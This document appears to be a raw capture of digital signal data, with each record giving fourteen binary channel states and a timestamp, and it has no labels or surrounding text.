0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878224e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878252e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878276e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878300e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878324e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878348e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878372e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878400e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878424e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878452e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878476e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878500e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878524e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878548e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878572e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878600e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878624e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878652e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878676e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878700e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878724e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878748e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878772e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878800e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878824e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878852e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878876e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878900e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878924e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.1878948e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.1878972e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.2003672e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.2003884e-02 1,1,0,1,0,0,0,0,0,0,0,1,0,1,1.2003900e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.2003924e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.2004204e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.2004228e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.2004252e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.2004276e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.2004300e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.2004324e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.2004348e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.2004372e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.2004400e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.2004424e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.2004452e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.2004476e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.2004500e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2004508e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2004524e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2004548e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2004572e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2004600e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2004624e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2004652e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2004676e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2004700e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2004724e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2004748e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2004772e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2004800e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2004824e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2004852e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2004876e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2004900e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2004924e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2004948e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2004972e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005000e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005024e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005052e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005076e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005100e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005124e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005148e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005172e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005200e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005224e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005252e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005276e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005300e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005324e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005348e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005372e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005400e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005424e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005452e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005476e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005500e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005524e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005548e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005572e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2005580e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2005600e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2005624e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2005652e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2005676e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2005700e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2005724e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2005748e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2005772e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2005800e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2005824e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2005852e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2005876e-02 1,1,0,1,0,1,0,0,0,0,0,0,0,0,1.2005880e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005884e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005900e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005924e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2005948e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2005972e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006000e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006024e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006052e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006076e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006100e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006124e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006148e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006172e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006200e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006224e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006252e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006276e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006300e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006324e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006348e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006372e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006400e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006424e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006452e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006476e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006500e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006524e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006548e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006572e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006600e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006624e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006652e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006676e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006700e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006724e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006748e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006772e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006800e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006824e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006852e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006876e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006900e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006924e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2006948e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2006972e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2006980e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2007000e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2007024e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2007052e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2007076e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2007100e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2007124e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2007148e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2007172e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2007200e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2007224e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.2007252e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.2007276e-02 1,1,0,1,0,1,0,0,0,0,0,0,0,0,1.2007280e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007284e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007300e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007324e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007348e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007372e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007396e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007452e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007476e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007500e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007524e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007548e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007572e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007600e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007652e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007676e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007700e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007724e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007748e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007772e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007800e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007820e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007852e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007876e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007900e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007924e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2007948e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2007972e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008000e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008052e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008076e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008100e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008124e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008148e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008172e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008200e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008252e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008276e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008300e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008324e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008348e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008372e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008400e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008424e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008452e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008476e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008500e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008524e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008548e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008572e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008600e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008624e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008652e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008676e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008700e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008724e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008748e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008772e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008800e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008824e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008852e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008876e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008900e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008924e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2008948e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2008972e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009000e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009024e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009052e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009076e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009100e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009124e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009148e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009172e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009200e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009224e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009252e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009276e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009300e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009324e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009348e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009372e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009400e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009424e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009452e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009476e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009500e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009524e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009548e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009572e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009600e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009624e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009644e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009672e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009696e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009724e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009748e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009772e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009796e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009820e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009844e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009872e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009896e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009924e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009948e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2009972e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2009996e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2010044e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010072e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2010096e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010124e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2010148e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010172e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2010196e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2010244e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010272e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2010296e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010324e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2010348e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010372e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2010396e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2010444e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010472e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2010496e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010524e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.2010548e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.2010572e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.2135576e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.2135748e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2135768e-02 0,0,1,1,0,0,0,0,0,0,0,1,0,1,1.2135804e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2135828e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.2136132e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2136156e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.2136180e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2136212e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.2136232e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2136260e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.2136284e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2136308e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.2136332e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.2136356e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.2136380e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136408e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136412e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136432e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136460e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136484e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136508e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136532e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136556e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136580e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136612e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136660e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136684e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136708e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136732e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136756e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136780e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136812e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136832e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136860e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136884e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136908e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136932e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2136956e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2136980e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137008e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137032e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137060e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137084e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137108e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137132e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137156e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137180e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137232e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137260e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137284e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137308e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137332e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137356e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137380e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137408e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137432e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137460e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137484e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137508e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137532e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137556e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137580e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137608e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137632e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137660e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137684e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137708e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137732e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137756e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137780e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137808e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137832e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137860e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137884e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137908e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2137956e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2137980e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138032e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138060e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138108e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138132e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138184e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138208e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138260e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138284e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138332e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138356e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138380e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138408e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138432e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138460e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138484e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138508e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138532e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138556e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138580e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138608e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138632e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138660e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138684e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138708e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138732e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138756e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138780e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2138808e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2138832e-02 